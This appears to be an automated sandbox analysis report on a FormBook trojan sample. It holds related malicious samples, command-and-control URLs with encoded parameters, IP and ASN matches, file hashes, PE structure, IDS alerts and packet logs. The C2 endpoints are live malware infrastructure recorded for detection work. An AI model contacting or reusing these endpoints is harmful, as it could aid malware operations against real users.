                                                                  • www.eclorui.com/u9pi/?uXR=Z6AdLL&QDHdAp=SWx04GMips4+qG0r1MuFGGrLJlmHj2ZkiaS2KvW5DkDO80Zko+5IrbiudSoPPaV6iNFo
                                                                  PO NEW ORDER 002001123.exeGet hashmaliciousBrowse
                                                                  • www.sparktattoo.com/0mq2/?c4=IDKtp8tH&4h_hvt=idlga/P0FfYCKTBivrcOkdytvtILpJxZJlPumr4sHFEsS0Scr/u/HZg+xbKITV9CPDtJ
                                                                  Swift advice Receipt.exeGet hashmaliciousBrowse
                                                                  • www.a-v-r.com/n86i/?u2MpU0a=WwYEqAm2RTF4TFg6Jp6u7CuwpfJ8oxKF4GY56fD50OPmZs5P3Qyp6f8YN06/kKU0Yzpf&1bWh=5jQLgpC8L23
                                                                  eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                                  • www.newmopeds.com/p2io/?0R-DOx9=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf0TAQaa2gAlI7xx6A==&y6A=xFQDIPbxpJaT
                                                                  Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                  • www.cool-sil.com/iic6/?r4pT=y/kfwyw/RZwsvgZE5IY9NPvw7FTiW/OGKxX5BqNDRQj08yuVS/JTuewaC78miPUy3gtG&lR-x=DPUt3nr8mrdpDjG
                                                                  TT-Bank-Slip.exeGet hashmaliciousBrowse
                                                                  • www.vaginalmedicine.com/m3rc/?p2=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&6lM=SJEx9rv
                                                                  Enquiry_014821-23.exeGet hashmaliciousBrowse
                                                                  • www.johnmabry.com/n86i/?zBtlQRl=Y8G/RqOPd6iMXSNDp68Mpx61scf3/6KZP+emN2XlS3BALTl1RcjIqekJnqea+Qg2WqdJDqumrQ==&-ZW=NBsHKPh0D0YP7FE
                                                                  SKM_4050210326102400 jpg.exeGet hashmaliciousBrowse
                                                                  • www.justswap.exchange/nvj9/?4h=Cjox&2d=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN6sncqWGGRf/
                                                                  kkaH2ZEdQ1.exeGet hashmaliciousBrowse
                                                                  • www.cacacece.com/ybn/?oRm8=s8YlDbK80xIp&-ZdTr=nRee68VRz3NrMycEhRd2xL3VYKU8ZPsfy7+/YZQiZ17kpYPgKQlxEGBpOHvvMJMEZLP0
                                                                  RE Purchase Order.exeGet hashmaliciousBrowse
                                                                  • www.dahumblehustla.com/u6e4/?WBZD=FcjbzBS6ioR5wNj31i3bICntrHdtVtLDdz4suCSLzvDCKJtKmLQo4u4Bo+cvT6cF9+Bm&TR-=0b08lfbHdjGhtdZp

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  www.scuolatua.comSwift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  www.aizaibali.comQxnlprRUTx.exeGet hashmaliciousBrowse
                                                                  • 154.88.31.204
                                                                  w3Qf2wBNX7.exeGet hashmaliciousBrowse
                                                                  • 154.88.31.204
                                                                  www.ecofingers.comd6qU4nYIEp.exeGet hashmaliciousBrowse
                                                                  • 52.58.78.16
                                                                  seBe6bgLTw.exeGet hashmaliciousBrowse
                                                                  • 13.248.216.40
                                                                  7VGeqwDKdb.exeGet hashmaliciousBrowse
                                                                  • 13.248.216.40

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  AMAZON-02USS0qI7cmeOWGet hashmaliciousBrowse
                                                                  • 35.75.55.55
                                                                  Form BA.xlsxGet hashmaliciousBrowse
                                                                  • 3.121.113.175
                                                                  #6495PI-29458-2020.exeGet hashmaliciousBrowse
                                                                  • 54.169.219.94
                                                                  Statement SKBMT 09818.jarGet hashmaliciousBrowse
                                                                  • 75.2.26.18
                                                                  DCBR.msiGet hashmaliciousBrowse
                                                                  • 18.228.5.161
                                                                  NQBNpLezqZKv1P4.exeGet hashmaliciousBrowse
                                                                  • 46.137.146.55
                                                                  kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                  • 52.217.42.228
                                                                  kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                                  • 52.217.201.169
                                                                  Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                  • 52.216.94.27
                                                                  ovLjmo5UoEGet hashmaliciousBrowse
                                                                  • 63.34.62.30
                                                                  o3ZUDIEL1vGet hashmaliciousBrowse
                                                                  • 18.151.13.78
                                                                  D1dU3jQ1IIGet hashmaliciousBrowse
                                                                  • 34.208.242.240
                                                                  mal.exeGet hashmaliciousBrowse
                                                                  • 52.58.78.16
                                                                  vjsBNwolo9.jsGet hashmaliciousBrowse
                                                                  • 76.223.26.96
                                                                  r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                  • 52.217.135.113
                                                                  A7X93JRxhpGet hashmaliciousBrowse
                                                                  • 54.151.74.14
                                                                  1Ds9g7CEspGet hashmaliciousBrowse
                                                                  • 13.208.189.104
                                                                  XuQRPW44hiGet hashmaliciousBrowse
                                                                  • 54.228.23.118
                                                                  Taf5zLti30Get hashmaliciousBrowse
                                                                  • 44.231.84.110
                                                                  5qpsqg7U0GGet hashmaliciousBrowse
                                                                  • 34.219.219.82
                                                                  ARUBA-ASNITSwift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  Xlojlgo2gbGet hashmaliciousBrowse
                                                                  • 134.255.177.23
                                                                  XfKsLIPLUuGet hashmaliciousBrowse
                                                                  • 217.73.230.179
                                                                  o0z4JJpYNfGet hashmaliciousBrowse
                                                                  • 212.237.36.89
                                                                  soa-032119.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  d6qU4nYIEp.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  1Ptfo0FZUMT7hlK.exeGet hashmaliciousBrowse
                                                                  • 89.46.110.19
                                                                  0VjjGsIIBB.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  WPxoHlbMVs.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  hiisl0XvrE.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  cCEP3pyVp8.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  pCCZmmulmJ.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  242jQP4mQP.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  RblUKpEC0p.exeGet hashmaliciousBrowse
                                                                  • 89.46.107.249
                                                                  N0vpYgIYpv.exeGet hashmaliciousBrowse
                                                                  • 62.149.144.60
                                                                  droxoUY6SU.exeGet hashmaliciousBrowse
                                                                  • 62.149.144.56
                                                                  0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  28Y753mbw5.exeGet hashmaliciousBrowse
                                                                  • 80.88.87.243
                                                                  7ujc2szSQX.exeGet hashmaliciousBrowse
                                                                  • 80.88.87.243

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  No created / dropped files found

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.939883976403979
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:v8kZUFgdD4.exe
                                                                  File size:188889
                                                                  MD5:57f3ae2842ffb5ceea386d0b97a52818
                                                                  SHA1:68423398d025d3cbbb944ee4c3cea5501df67761
                                                                  SHA256:a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
                                                                  SHA512:f398186c2f5adb9726aac3aead8289abc9288404b4b39dbabc66494a77b0160ca560cf52c9f76b15b34619f150f516a74db96db967f75942f3c9f325c5da4a81
                                                                  SSDEEP:3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..{(dl((dl((dl(.{g()dl(.xb( dl(.{f(?dl(!..(#dl((dm(.dl(!..()dl(!..()dl(Rich(dl(........................PE..L....~.`...........

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40205a
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x60F97EF0 [Thu Jul 22 14:21:36 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:91ecb5a25c0109a651f89e2d72e3496d

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push FFFFFFFFh
                                                                  push 004050F8h
                                                                  push 00402D34h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  sub esp, 58h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-18h], esp
                                                                  call dword ptr [00405050h]
                                                                  xor edx, edx
                                                                  mov dl, ah
                                                                  mov dword ptr [0040627Ch], edx
                                                                  mov ecx, eax
                                                                  and ecx, 000000FFh
                                                                  mov dword ptr [00406278h], ecx
                                                                  shl ecx, 08h
                                                                  add ecx, edx
                                                                  mov dword ptr [00406274h], ecx
                                                                  shr eax, 10h
                                                                  mov dword ptr [00406270h], eax
                                                                  push 00000001h
                                                                  call 00007F6BF0C0972Dh
                                                                  pop ecx
                                                                  test eax, eax
                                                                  jne 00007F6BF0C08BEAh
                                                                  push 0000001Ch
                                                                  call 00007F6BF0C08CA7h
                                                                  pop ecx
                                                                  call 00007F6BF0C0964Dh
                                                                  test eax, eax
                                                                  jne 00007F6BF0C08BEAh
                                                                  push 00000010h
                                                                  call 00007F6BF0C08C96h
                                                                  pop ecx
                                                                  xor esi, esi
                                                                  mov dword ptr [ebp-04h], esi
                                                                  call 00007F6BF0C0947Bh
                                                                  call 00007F6BF0C093D5h
                                                                  mov dword ptr [00406694h], eax
                                                                  call 00007F6BF0C0925Eh
                                                                  mov dword ptr [00406264h], eax
                                                                  call 00007F6BF0C0902Bh
                                                                  call 00007F6BF0C08F6Eh
                                                                  call 00007F6BF0C08C8Ch
                                                                  mov dword ptr [ebp-30h], esi
                                                                  lea eax, dword ptr [ebp-5Ch]
                                                                  push eax
                                                                  call dword ptr [0040504Ch]
                                                                  call 00007F6BF0C08F12h
                                                                  mov dword ptr [ebp-64h], eax
                                                                  test byte ptr [ebp-30h], 00000001h
                                                                  je 00007F6BF0C08BE8h
                                                                  movzx eax, word ptr [ebp-2Ch]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS98 (6.0) build 8168
                                                                  • [C++] VS98 (6.0) build 8168
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [LNK] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x54300x78.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x50000xf8.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x341c0x3600False0.580005787037data6.26349761527IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x50000x9640xa00False0.44921875data5.07425103063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x60000x6980x400False0.2001953125data1.23908157506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                  Imports

                                                                  DLLImport
                                                                  USER32.dllGrayStringW, GetDC
                                                                  SHLWAPI.dllStrCmpNIA, StrToIntA, PathBuildRootA, UrlCompareA, StrCmpNA, UrlCanonicalizeA
                                                                  WINSPOOL.DRVAddJobA, GetPrinterW, DeviceCapabilitiesW, OpenPrinterA
                                                                  WS2_32.dllbind, recv, WSACleanup, getprotobyname
                                                                  KERNEL32.dllGetEnvironmentStrings, LoadLibraryA, GetProcAddress, HeapReAlloc, VirtualAlloc, HeapAlloc, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, GetModuleFileNameA, WriteFile, RtlUnwind, HeapFree, VirtualFree, HeapCreate, HeapDestroy, GetLastError, TlsGetValue, GetModuleHandleA, GetStartupInfoW, GetVersion, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameW, FreeEnvironmentStringsA, MultiByteToWideChar, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  07/22/21-17:43:18.792527TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.634.102.136.180
                                                                  07/22/21-17:43:18.792527TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.634.102.136.180
                                                                  07/22/21-17:43:18.792527TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.634.102.136.180
                                                                  07/22/21-17:43:18.931600TCP1201ATTACK-RESPONSES 403 Forbidden804974834.102.136.180192.168.2.6
                                                                  07/22/21-17:43:31.750777ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                  07/22/21-17:43:36.803444TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.652.58.78.16
                                                                  07/22/21-17:43:36.803444TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.652.58.78.16
                                                                  07/22/21-17:43:36.803444TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.652.58.78.16
                                                                  07/22/21-17:43:47.172087TCP1201ATTACK-RESPONSES 403 Forbidden804975834.102.136.180192.168.2.6
                                                                  07/22/21-17:44:09.256104TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.6103.138.88.11
                                                                  07/22/21-17:44:09.256104TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.6103.138.88.11
                                                                  07/22/21-17:44:09.256104TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.6103.138.88.11
                                                                  07/22/21-17:44:14.927140TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6162.241.62.54
                                                                  07/22/21-17:44:14.927140TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6162.241.62.54
                                                                  07/22/21-17:44:14.927140TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6162.241.62.54

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 22, 2021 17:43:11.343118906 CEST4973480192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:11.575372934 CEST8049734154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:12.136018038 CEST4973480192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:12.368423939 CEST8049734154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:13.014456034 CEST4973480192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:13.246651888 CEST8049734154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:14.653124094 CEST4974080192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:14.882957935 CEST8049740154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:15.526932955 CEST4974080192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:15.758316040 CEST8049740154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:16.326723099 CEST4974080192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:16.556637049 CEST8049740154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:18.749845028 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.792249918 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.792349100 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.792526960 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.834424019 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.931600094 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.931624889 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.931854963 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.931946039 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.973994970 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:24.088432074 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.280039072 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.283181906 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.283298969 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.473177910 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.475476027 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.475632906 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.475788116 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.475841045 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.666521072 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:36.760740042 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.802845001 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.803149939 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.803443909 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.847222090 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.847250938 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.847265005 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.847419977 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.847469091 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.889657021 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:46.990670919 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.033973932 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.034095049 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.034261942 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.077419043 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.172086954 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.172107935 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.172236919 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.172348976 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.214202881 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:57.808830023 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.053662062 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.053909063 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.054111004 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.297991991 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.298029900 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.298044920 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.298280001 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.298341036 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.542184114 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:44:03.474526882 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.542164087 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.542320967 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.542511940 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.612077951 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612123013 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612144947 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612165928 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612847090 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.612873077 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.692063093 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:08.996076107 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.255644083 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.255965948 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.256103992 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.551270008 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556632996 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556662083 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556957006 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.556978941 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.871092081 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:14.757420063 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:14.926631927 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:14.926965952 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:14.927139997 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.094000101 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.440208912 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.647013903 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720453024 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720489979 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720509052 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720535994 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.720561028 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.720598936 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.730438948 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.730526924 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.730544090 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.730595112 CEST4976380192.168.2.6162.241.62.54

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 22, 2021 17:42:03.511848927 CEST4944853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:03.569889069 CEST53494488.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:04.450882912 CEST6034253192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:04.500457048 CEST53603428.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:05.441169024 CEST6134653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:05.491653919 CEST53613468.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:06.618273020 CEST5177453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:06.677932024 CEST53517748.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:06.793505907 CEST5602353192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:06.852504969 CEST53560238.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:08.337930918 CEST5838453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:08.397641897 CEST53583848.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:09.781018019 CEST6026153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:09.830863953 CEST53602618.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:10.985940933 CEST5606153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:11.043087959 CEST53560618.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:12.190715075 CEST5833653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:12.243096113 CEST53583368.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:13.402030945 CEST5378153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:13.451323032 CEST53537818.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:14.271378994 CEST5406453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:14.330457926 CEST53540648.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:15.578588963 CEST5281153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:15.636074066 CEST53528118.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:16.940037966 CEST5529953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:16.990402937 CEST53552998.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:18.087132931 CEST6374553192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:18.137650013 CEST53637458.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:19.463337898 CEST5005553192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:19.515728951 CEST53500558.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:20.275600910 CEST6137453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:20.325866938 CEST53613748.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:21.392210960 CEST5033953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:21.450920105 CEST53503398.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:23.156260014 CEST6330753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:23.216284990 CEST53633078.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:39.544902086 CEST4969453192.168.2.68.8.8.8
